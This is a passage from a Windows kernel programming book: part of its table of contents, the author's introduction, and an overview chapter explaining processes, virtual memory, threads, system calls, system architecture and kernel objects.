Object Attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
46
Device Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
50
Opening Devices Directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
52
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
55
Chapter 4: Driver from Start to Finish
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
56
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
56
Driver Initialization
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
57
Passing Information to the Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
59
Client / Driver Communication Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . .
60
Creating the Device Object
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
60
Client Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
63
The Create and Close Dispatch Routines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
65
The Write Dispatch Routine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
66
Installing and Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
70
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
74
Chapter 5: Debugging and Tracing
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
75
Debugging Tools for Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
75
Introduction to WinDbg . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
76
Tutorial: User mode debugging basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
77
Kernel Debugging
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
94
Local Kernel Debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
94
Local kernel Debugging Tutorial
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
96
Full Kernel Debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
104
Using a Virtual Serial Port . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
104
Using the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
108
Kernel Driver Debugging Tutorial . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
109
Asserts and Tracing
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
114
Asserts
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
114
Extended DbgPrint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
116
Other Debugging Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
121
Trace Logging
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
122
Viewing ETW Traces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
125
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
130
Chapter 6: Kernel Mechanisms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
131
Interrupt Request Level (IRQL)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
131
Raising and Lowering IRQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
134
Thread Priorities vs. IRQLs
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
135
Deferred Procedure Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
135
Using DPC with a Timer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
138
Asynchronous Procedure Calls
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
139
Critical Regions and Guarded Regions
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
140
Structured Exception Handling
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
140
Using __try/__except
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
142
Using __try/__finally . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
144
Using C++ RAII Instead of __try / __finally
. . . . . . . . . . . . . . . . . . . . . . .
146
System Crash . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
148
Crash Dump Information
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
150
Analyzing a Dump File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
154
System Hang . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
157
Thread Synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
159
Interlocked Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
159
Dispatcher Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
161
Mutex . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
163
Fast Mutex . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
169
Semaphore . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
169
Event . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
170
Named Events
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
171
Executive Resource . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
173
High IRQL Synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
175
The Spin Lock
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
177
Queued Spin Locks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
180
Work Items . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
181
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
183
Chapter 7: The I/O Request Packet
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
184
Introduction to IRPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
184
Device Nodes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
185
IRP Flow
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
189
IRP and I/O Stack Location
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
190
Viewing IRP Information
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
193
Dispatch Routines
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
197
Completing a Request . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
198
Accessing User Buffers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
199
Buffered I/O
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
200
Direct I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
204
User Buffers for IRP_MJ_DEVICE_CONTROL
. . . . . . . . . . . . . . . . . . . . . . . . .
209
Putting it All Together: The Zero Driver
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
211
Using a Precompiled Header . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
212
The DriverEntry Routine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
214
The Create and Close Dispatch Routines . . . . . . . . . . . . . . . . . . . . . . . . . . . .
216
The Read Dispatch Routine
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
216
The Write Dispatch Routine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
217
Test Application
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
218
Read/Write Statistics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
219
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
223
Chapter 8: Advanced Programming Techniques (Part 1) . . . . . . . . . . . . . . . . . . . . . .
224
Driver Created Threads
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
224
Memory Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
226
Pool Allocations
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
226
Secure Pools
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
229
Overloading the new and delete Operators . . . . . . . . . . . . . . . . . . . . . . . . . .
230
Lookaside Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
233
The “Classic” Lookaside API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
233
The Newer Lookaside API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
235
Calling Other Drivers
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
237
Putting it All Together: The Melody Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
239
Client Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
255
Invoking System Services
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
256
Example: Enumerating Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
258
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
261
Chapter 9: Process and Thread Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
262
Process Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
262
Implementing Process Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
265
The DriverEntry Routine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
269
Handling Process Exit Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
271
Handling Process Create Notifications
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
274
Providing Data to User Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
277
The User Mode Client . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
280
Thread Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
283
Image Load Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
286
Final Client Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
293
Remote Thread Detection
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
296
The Detector Client
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
305
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
306
Introduction
Windows kernel programming is considered by many a dark art, available to a select few that manage to
somehow unlock the mysteries of the Windows kernel. Kernel development, however, is no different from
user-mode development, at least in general terms. In both cases, a good understanding of the platform is
essential for producing high-quality code.
The book is a guide to programming within the Windows kernel, using the well-known Visual Studio
integrated development environment (IDE). This environment is familiar to many developers in the
Microsoft space, so that the learning curve is restricted to kernel understanding, coding and debugging,
with less friction from the development tools.
The book targets software device drivers, a term I use to refer to drivers that do not deal with hardware.
Software kernel drivers have full access to the kernel, allowing these to perform any operation allowed by
the kernel. Some software drivers are more specific, such as file system mini filters, also described in the
book.
Who Should Read This Book
The book is intended for software developers that target the Windows kernel, and need to write kernel
drivers to achieve their goals. Common scenarios where kernel drivers are employed are in the Cyber
Security space, where kernel drivers are the chief mechanism to get notified of important events, with the
power to intercept certain operations. The book uses C and C++ for code examples, as the kernel API is all
C. C++ is used where it makes sense, where its advantages are obvious in terms of maintenance, clarity,
resource management, or any combination of these. The book does not use complex C++ constructs, such
as template metaprogramming. The book is not about C++, it’s about Windows kernel drivers.
What You Should Know to Use This Book
Readers should be very comfortable with the C programming language, especially with pointers, structures,
and its standard library, as these occur very frequently when working with kernel APIs. Basic C++
knowledge is highly recommended, although it is possible to traverse the book with C proficiency only.
Book Contents
Here is a quick rundown of the chapters in the book:
• Chapter 1 (“Windows Internals Overview”) provides the fundamentals of the internal workings of
the Windows OS at a high level, enough to get the essentials without being bogged down by
too many details.
• Chapter 2 (“Getting Started with Kernel Development”) describes the tools and procedures needed
to set up a development environment for developing kernel drivers. A very simple driver is created
to make sure all the tools and procedures are working correctly.
• Chapter 3 (“Kernel Programming Basics”) looks at the fundamentals of writing drivers, including
basic kernel APIs, handling of common programming tasks involving strings, linked lists, dynamic
memory allocations, and more.
• Chapter 4 (“Driver from Start to Finish”) shows how to build a complete driver that performs some
useful functionality, along with a client application to drive it.
If you are new to Windows kernel development, you should read chapters 1 to 7 in order. Chapter 8 contains
some advanced material you may want to go back to after you have built a few simple drivers. Chapters
9 onward describe specialized techniques, and in theory at least, can be read in any order.
Sample Code
All the sample code from the book is freely available on the book’s Github repository at
https://github.com/zodiacon/windowskernelprogrammingbook2e. Updates to the code samples will be pushed to this
repository. It’s recommended the reader clone the repository to the local machine, so it’s easy to experiment
with the code directly.
All code samples have been compiled with Visual Studio 2019. It’s possible to compile most code samples
with earlier versions of Visual Studio if desired. There might be few features of the latest C++ standards
that may not be supported in earlier versions, but these should be easy to fix.
Happy reading!
Pavel Yosifovich
June 2022
Chapter 1: Windows Internals Overview
This chapter describes the most important concepts in the internal workings of Windows. Some of the
topics will be described in greater detail later in the book, where they are closely related to the topic at hand.
Make sure you understand the concepts in this chapter, as these form the foundation upon which any driver,
and even user-mode low-level code, is built.
In this chapter:
• Processes
• Virtual Memory
• Threads
• System Services
• System Architecture
• Handles and Objects
Processes
A process is a containment and management object that represents a running instance of a program. The
term “process runs,” which is used fairly often, is inaccurate. Processes don’t run – processes manage.
Threads are the ones that execute code and technically run. From a high-level perspective, a process owns
the following:
• An executable program, which contains the initial code and data used to execute code within the
process. This is true for most processes, but some special ones don’t have an executable image
(created directly by the kernel).
• A private virtual address space, used for allocating memory for whatever purposes the code within
the process needs it.
• An access token (called primary token), which is an object that stores the security context of the
process, used by threads executing in the process (unless a thread assumes a different token by using
impersonation).
• A private handle table to executive objects, such as events, semaphores, and files.
• One or more threads of execution. A normal user-mode process is created with one thread (executing
the classic main/WinMain function). A user mode process without threads is mostly useless, and
under normal circumstances will be destroyed by the kernel.
These elements of a process are depicted in figure 1-1.
Figure 1-1: Important ingredients of a process
A process is uniquely identified by its Process ID, which remains unique as long as the kernel process object
exists. Once it’s destroyed, the same ID may be reused for new processes. It’s important to realize that the
executable file itself is not a unique identifier of a process. For example, there may be five instances of
notepad.exe running at the same time. Each of these Notepad instances has its own address space, threads,
handle table, process ID, etc. All those five processes are using the same image file (notepad.exe) as their
initial code and data. Figure 1-2 shows a screenshot of Task Manager’s Details tab showing five instances
of Notepad.exe, each with its own attributes.
Figure 1-2: Five instances of notepad
Virtual Memory
Every process has its own virtual, private, linear address space. This address space starts out empty (or
close to empty, since the executable image and NtDll.Dll are the first to be mapped, followed by more
subsystem DLLs). Once execution of the main (first) thread begins, memory is likely to be allocated, more
DLLs loaded, etc. This address space is private, which means other processes cannot access it directly.
The address space range starts at zero (technically the first and last 64KB of the address space cannot be
committed), and goes all the way to a maximum which depends on the process “bitness” (32 or 64 bit) and
the operating system “bitness” as follows:
• For 32-bit processes on 32-bit Windows systems, the process address space size is 2 GB by default.
• For 32-bit processes on 32-bit Windows systems that use the increase user virtual address space
setting, the process can be configured to have up to 3 GB of address space. To get the extended
address space, the executable from which the process was created must have been marked with the
LARGEADDRESSAWARE linker flag in its PE header. If it was not, it would still be limited to 2 GB.
• For 64-bit processes (on a 64-bit Windows system, naturally), the address space size is 8 TB (Windows
8 and earlier) or 128 TB (Windows 8.1 and later).
• For 32-bit processes on a 64-bit Windows system, the address space size is 4 GB if the executable
image has the LARGEADDRESSAWARE flag in its PE header. Otherwise, the size remains at 2 GB.
The requirement of the LARGEADDRESSAWARE flag stems from the fact that a 2 GB address
range requires 31 bits only, leaving the most significant bit (MSB) free for application use.
Specifying this flag indicates that the program is not using bit 31 for anything and so having
that bit set (which would happen for addresses larger than 2 GB) is not an issue.
Each process has its own address space, which makes any process address relative, rather than absolute.
For example, when trying to determine what lies in address 0x20000, the address itself is not enough; the
process to which this address relates must be specified.
The memory itself is called virtual, which means there is an indirect relationship between an address
and the exact location where it’s found in physical memory (RAM). A buffer within a process may be
mapped to physical memory, or it may temporarily reside in a file (such as a page file). The term virtual
refers to the fact that from an execution perspective, there is no need to know if the memory about to be
accessed is in RAM or not; if the memory is indeed mapped to RAM, the CPU will perform the virtual-to-physical
translation before accessing the data. If the memory is not resident (specified by a flag in the
translation table entry), the CPU will raise a page fault exception that causes the memory manager’s page
fault handler to fetch the data from the appropriate file (if indeed it’s a valid page fault), copy it to RAM,
make the required changes in the page table entries that map the buffer, and instruct the CPU to try again.
Figure 1-3 shows this conceptual mapping from virtual to physical memory for two processes.
Figure 1-3: virtual memory mapping
The unit of memory management is called a page. Every attribute related to memory is always at a
page’s granularity, such as its protection or state. The size of a page is determined by CPU type (and on
some processors, may be configurable), and in any case, the memory manager must follow suit. Normal
(sometimes called small) page size is 4 KB on all Windows-supported architectures.
Apart from the normal (small) page size, Windows also supports large pages. The size of a large page is 2
MB (x86/x64/ARM64) or 4 MB (ARM). This is based on using the Page Directory Entry (PDE) to map the
large page without using a page table. This results in quicker translation, but most importantly better use
of the Translation Lookaside Buffer (TLB) – a cache of recently translated pages maintained by the CPU.
In the case of a large page, a single TLB entry maps significantly more memory than a small page.
The downside of large pages is the need to have the memory contiguous in RAM, which can
fail if memory is tight or very fragmented. Also, large pages are always non-pageable and can
only use read/write protection.
Huge pages of 1 GB in size are supported on Windows 10 and Server 2016 and later. These are used
automatically with large pages if an allocation is at least 1 GB in size, and that size can be located as
contiguous in RAM.
Page States
Each page in virtual memory can be in one of three states:
• Free – the page is not allocated in any way; there is nothing there. Any attempt to access that page
would cause an access violation exception. Most pages in a newly created process are free.
• Committed – the reverse of free; an allocated page that can be accessed successfully (assuming non-
conflicting protection attributes; for example, writing to a read-only page causes an access violation).
Committed pages are mapped to RAM or to a file (such as a page file).
• Reserved – the page is not committed, but the address range is reserved for possible future
commitment. From the CPU’s perspective, it’s the same as Free – any access attempt raises an
access violation exception. However, new allocation attempts using the VirtualAlloc function
(or NtAllocateVirtualMemory, the related native API) that does not specify a specific address
would not allocate in the reserved region. A classic example of using reserved memory to maintain
contiguous virtual address space while conserving committed memory usage is described later in
this chapter in the section “Thread Stacks”.
System Memory
The lower part of the address space is for use by user-mode processes. While a particular thread is executing,
its associated process address space is visible from address zero to the upper limit as described in the
previous section. The operating system, however, must also reside somewhere – and that somewhere is
the upper address range that’s supported on the system, as follows:
• On 32-bit systems running without the increase user virtual address space setting, the operating sys-
tem resides in the upper 2 GB of virtual address space, from address 0x80000000 to 0xFFFFFFFF.
• On 32-bit systems configured with the increase user virtual address space setting, the operating
system resides in the address space left. For example, if the system is configured with 3 GB user
address space per process (the maximum), the OS takes the upper 1 GB (from address 0xC0000000
to 0xFFFFFFFF). The component that suffers most from this address space reduction is the file
system cache.
• On 64-bit systems running Windows 8, Server 2012 and earlier, the OS takes the upper 8 TB of virtual
address space.
• On 64-bit systems running Windows 8.1, Server 2012 R2 and later, the OS takes the upper 128 TB of
virtual address space.
Figure 1-4 shows the virtual memory layout for the two “extreme” cases: 32-bit process on a 32-bit system
(left) and a 64-bit process on a 64-bit system (right).
Figure 1-4: virtual memory layout
System space is not process-relative – after all, it’s the same system, the same kernel, the same drivers that
service every process on the system (the exception is some system memory that is on a per-session basis
but is not important for this discussion). It follows that any address in system space is absolute rather than
relative, since it “looks” the same from every process context. Of course, actual access from user mode into
system space results in an access violation exception.
System space is where the kernel itself, the Hardware Abstraction Layer (HAL), and kernel drivers reside
once loaded. Thus, kernel drivers are automatically protected from direct user mode access. It also means
they have a potentially system-wide impact. For example, if a kernel driver leaks memory, that memory
will not be freed even after the driver unloads. User-mode processes, on the other hand, can never leak
anything beyond their lifetime. The kernel is responsible for closing and freeing everything private to a
dead process (all handles are closed and all private memory is freed).
Threads
The actual entities that execute code are threads. A thread is contained within a process, using the
resources exposed by the process to do work (such as virtual memory and handles to kernel objects).
The most important information a thread owns is the following:
• Current access mode, either user or kernel.
• Execution context, including processor registers and execution state.
• One or two stacks, used for local variable allocations and call management.
• Thread Local Storage (TLS) array, which provides a way to store thread-private data with uniform
access semantics.
• Base priority and a current (dynamic) priority.
• Processor affinity, indicating the processors on which the thread is allowed to run.
The most common states a thread can be in are:
• Running – currently executing code on a (logical) processor.
• Ready – waiting to be scheduled for execution because all relevant processors are busy or
unavailable.
• Waiting – waiting for some event to occur before proceeding. Once the event occurs, the thread
goes to the Ready state.
Figure 1-5 shows the state diagram for these states. The numbers in parenthesis indicate the state numbers,
as can be viewed by tools such as Performance Monitor. Note that the Ready state has a sibling state called
Deferred Ready, which is similar, and exists to minimize internal locking.
Figure 1-5: Common thread states
Thread Stacks
Each thread has a stack it uses while executing, used to store local variables, parameters passed to functions
(in some cases), and where return addresses are stored prior to making function calls. A thread has at least
one stack residing in system (kernel) space, and it’s pretty small (default is 12 KB on 32-bit systems and 24
KB on 64-bit systems). A user-mode thread has a second stack in its process user-space address range and
is considerably larger (by default can grow to 1 MB). An example with three user-mode threads and their
stacks is shown in figure 1-6. In the figure, threads 1 and 2 are in process A and thread 3 is in process B.
The kernel stack always resides in RAM while the thread is in the Running or Ready states. The reason
for this is subtle and will be discussed later in this chapter. The user-mode stack, on the other hand, may
be paged out, just like any other user-mode memory.
The user-mode stack is handled differently than the kernel-mode stack in terms of its size. It starts out
with a certain amount of committed memory (could be as small as a single page), where the next page is
committed with a PAGE_GUARD attribute. The rest of the stack address space memory is reserved, thus
not wasting memory. The idea is to grow the stack in case the thread’s code needs to use more stack space.
If the thread needs more stack space it would access the guard page which would throw a page-guard
exception. The memory manager then removes the guard protection, and commits an additional page,
marking it with a PAGE_GUARD attribute. This way, the stack grows as needed, avoiding the entire stack
memory being committed upfront. Figure 1-7 shows this layout.
Figure 1-6: User mode threads and their stacks
Technically, Windows uses 3 guard pages rather than one in most cases.
Figure 1-7: Thread’s stack in user space
The sizes of a thread’s user-mode stack are determined as follows:
• The executable image has a stack commit and reserved values in its Portable Executable (PE) header.
These are taken as defaults if a thread does not specify alternative values. These are always used for
the first thread in the process.
• When a thread is created with CreateThread (or similar functions), the caller can specify its
required stack size, either the upfront committed size or the reserved size (but not both), depending
on a flag provided to the function; specifying zero uses the defaults set in the PE header.
Curiously enough, the functions CreateThread and CreateRemoteThread(Ex) only
allow specifying a single value for the stack size and can be the committed or the reserved size,
but not both. The native (undocumented) function, NtCreateThreadEx allows specifying
both values.
System Services (a.k.a. System Calls)
Applications need to perform various operations that are not purely computational, such as allocating
memory, opening files, creating threads, etc. These operations can only be ultimately performed by code
running in kernel mode. So how would user-mode code be able to perform such operations?
Let’s take a common (simple) example: a user running a Notepad process uses the File / Open menu to
request opening a file. Notepad’s code responds by calling the CreateFile documented Windows API
function. CreateFile is documented as implemented in kernel32.Dll, one of the Windows subsystem
DLLs. This function still runs in user mode, so there is no way it can directly open a file. After some
error checking, it calls NtCreateFile, a function implemented in NTDLL.dll, a foundational DLL that
implements the API known as the Native API, and is the lowest layer of code which is still in user mode.
This function (documented in the Windows Driver Kit for device driver developers) is the one that makes
the transition to kernel mode. Before the actual transition, it puts a number, called system service number,
into a CPU register (EAX on Intel/AMD architectures). Then it issues a special CPU instruction (syscall
on x64 or sysenter on x86) that makes the actual transition to kernel mode while jumping to a predefined
routine called the system service dispatcher.
The system service dispatcher, in turn, uses the value in that EAX register as an index into a System Service
Dispatch Table (SSDT). Using this table, the code jumps to the system service (system call) itself. For
our Notepad example, the SSDT entry would point to the NtCreateFile function, implemented by the
kernel’s I/O manager. Notice the function has the same name as the one in NTDLL.dll, and has the same
parameters as well. On the kernel side is the real implementation. Once the system service is complete,
the thread returns to user mode to execute the instruction following sysenter/syscall. This sequence
of calls is depicted in figure 1-8.
Figure 1-8: System service function call flow
General System Architecture
Figure 1-9 shows the general architecture of Windows, comprising user-mode and kernel-mode
components.
Figure 1-9: Windows system architecture
Here’s a quick rundown of the named boxes appearing in figure 1-9:
• User processes
These are normal processes based on image files, executing on the system, such as instances of
Notepad.exe, cmd.exe, explorer.exe, and so on.
• Subsystem DLLs
Subsystem DLLs are dynamic link libraries (DLLs) that implement the API of a subsystem. A
subsystem is a particular view of the capabilities exposed by the kernel. Technically, starting from
Windows 8.1, there is only a single subsystem – the Windows Subsystem. The subsystem DLLs
include well-known files, such as kernel32.dll, user32.dll, gdi32.dll, advapi32.dll, combase.dll, and
many others. These include mostly the officially documented API of Windows.
• NTDLL.DLL
A system-wide DLL, implementing the Windows native API. This is the lowest layer of code which
is still in user mode. Its most important role is to make the transition to kernel mode for system call
invocation. NTDLL also implements the Heap Manager, the Image Loader and some part of the user
mode thread pool.
• Service Processes
Service processes are normal Windows processes that communicate with the Service Control
Manager (SCM, implemented in services.exe) and allow some control over their lifetime. The SCM
can start, stop, pause, resume and send other messages to services. Services typically execute under
one of the special Windows accounts – local system, network service or local service.
• Executive
The Executive is the upper layer of NtOskrnl.exe (the “kernel”). It hosts most of the code that is
in kernel mode. It includes mostly the various “managers”: Object Manager, Memory Manager, I/O
Manager, Plug & Play Manager, Power Manager, Configuration Manager, etc. It’s by far larger than
the lower Kernel layer.
• Kernel
The Kernel layer implements the most fundamental and time-sensitive parts of kernel-mode OS
code. This includes thread scheduling, interrupt and exception dispatching, and implementation of
various kernel primitives such as mutexes and semaphores. Some of the kernel code is written in
CPU-specific machine language for efficiency and for getting direct access to CPU-specific details.
• Device Drivers
Device drivers are loadable kernel modules. Their code executes in kernel mode and so has the full
power of the kernel. This book is dedicated to writing certain types of kernel drivers.
• Win32k.sys
This is the kernel-mode component of the Windows subsystem. Essentially, it’s a kernel module
(driver) that handles the user interface part of Windows and the classic Graphics Device Inter-
face (GDI) APIs. This means that all windowing operations (CreateWindowEx, GetMessage,
PostMessage, etc.) are handled by this component. The rest of the system has little-to-no
knowledge of UI.
• Hardware Abstraction Layer (HAL)
The HAL is a software abstraction layer over the hardware closest to the CPU. It allows device
drivers to use APIs that do not require detailed and specific knowledge of things like Interrupt
Controllers or DMA controller. Naturally, this layer is mostly useful for device drivers written to
handle hardware devices.
• System Processes
System processes is an umbrella term used to describe processes that are typically “just there”, doing
their work; normally these processes are not communicated with directly. They are important
nonetheless, and some in fact, critical to the system’s well-being. Terminating some of them is fatal
and causes a system crash. Some of the system processes are native processes, meaning they use
the native API only (the API implemented by NTDLL). Example system processes include Smss.exe,
Lsass.exe, Winlogon.exe, and Services.exe.
• Subsystem Process
The Windows subsystem process, running the image Csrss.exe, can be viewed as a helper to the
kernel for managing processes running under the Windows subsystem. It is a critical process,
meaning if killed, the system would crash. There is one Csrss.exe instance per session, so on a
standard system two instances would exist – one for session 0 and one for the logged-on user session
(typically 1). Although Csrss.exe is the “manager” of the Windows subsystem (the only one left these
days), its importance goes beyond just this role.
• Hyper-V Hypervisor
The Hyper-V hypervisor exists on Windows 10 and server 2016 (and later) systems if they support
Virtualization Based Security (VBS). VBS provides an extra layer of security, where the normal OS is
a virtual machine controlled by Hyper-V. Two distinct Virtual Trust Levels (VTLs) are defined, where
VTL 0 consists of the normal user-mode/kernel-mode we know of, and VTL 1 contains the secure
kernel and Isolated User Mode (IUM). VBS is beyond the scope of this book. For more information,
check out the Windows Internals book and/or the Microsoft documentation.
Windows 10 version 1607 introduced the Windows Subsystem for Linux (WSL). Although this
may look like yet another subsystem, like the old POSIX and OS/2 subsystems supported by
Windows, it is not like that at all. The old subsystems were able to execute POSIX and OS/2 apps
if these were compiled using a Windows compiler to use the PE format and Windows system
calls. WSL, on the other hand, has no such requirement. Existing executables from Linux (stored
in ELF format) can be run as-is on Windows, without any recompilation.
To make something like this work, a new process type was created – the Pico process together
with a Pico provider. Briefly, a Pico process is an empty address space (minimal process) that is
used for WSL processes, where every system call (Linux system call) must be intercepted and
translated to the Windows system call(s) equivalent using that Pico provider (a device driver).
There is a true Linux (the user-mode part) installed on the Windows machine.
The above description is for WSL version 1. Starting with Windows 10 version 2004, Windows
supports a new version of WSL known as WSL 2. WSL 2 is not based on pico processes anymore.
Instead, it’s based on a hybrid virtual machine technology that allows installing a full Linux
system (including the Linux kernel), but still see and share the Windows machine’s resources,
such as the file system. WSL 2 is faster than WSL 1 and solves some edge cases that didn’t work
well in WSL 1, thanks to the real Linux kernel handling Linux system calls.
Handles and Objects
The Windows kernel exposes various types of objects for use by user-mode processes, the kernel itself and
kernel-mode drivers. Instances of these types are data structures in system space, created by the Object
Manager (part of the executive) when requested to do so by user-mode or kernel-mode code. Objects are
reference counted – only when the last reference to the object is released will the object be destroyed and
freed from memory.
Since these object instances reside in system space, they cannot be accessed directly by user mode. User
mode must use an indirect access mechanism, known as handles. A handle is an index to an entry in a table
maintained on a process by process basis, stored in kernel space, that points to a kernel object residing in
system space. There are various Create* and Open* functions to create/open objects and retrieve back
handles to these objects. For example, the CreateMutex user-mode function allows creating or opening a
mutex (depending on whether the object is named and exists). If successful, the function returns a handle
